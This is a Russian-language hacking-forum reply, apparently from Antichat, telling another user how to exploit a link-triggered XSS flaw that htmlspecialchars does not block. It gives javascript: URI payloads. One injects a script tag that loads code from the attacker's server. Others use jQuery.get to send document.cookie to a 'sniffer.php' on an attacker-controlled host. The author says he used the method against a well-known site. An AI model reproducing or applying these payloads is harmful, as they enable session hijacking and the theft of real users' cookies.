Показать сообщение отдельно

  #9  
Старый 06.02.2012, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию

Тут угловые скобки заменяются html сущностями. Видать прогнали через функцию htmlspecialchars(). И тут судя по всему скрипт срабатывает по нажатию по ссылки. Нередкий тип уязвимости. Так как тэг скрипта фильтруется, то закачать сам скрипт извне не получится. Но можно попробовать динамически создать скрипт и присвоить ему урл скрипта, лежащего на нашем сервере. Что-то типа

code:

javascript:x=document.createElement('script');x=x.setAttribu te('src','тут урл скрипта');document.getElementsByTagName('he ad').appendChild(x);

Таким образом мы не используя угловые скобки создаем динамический скрипт и подключаем к нему ресурс. Также, если на странице используется jQuery, можно просто поспользоваться этим, прописав

code:

javascript:jQuery.get('http://yoursite.com/sniffer.php?'+document.cookie);
или
javascript:$.get('http://yoursite.com/sniffer.php?'+document.cookie);

При клике данный метод позволяет отправлять get запросы на любой домен в сети. Недавно именно данный метод использовал в xss на одном из известных сайтов. И даже видео снимал. https://hpc.name/showthread.php?t=32341. Посмотри, там именно такого же рода уязвимость, что и у тебя.
 
Ответить с цитированием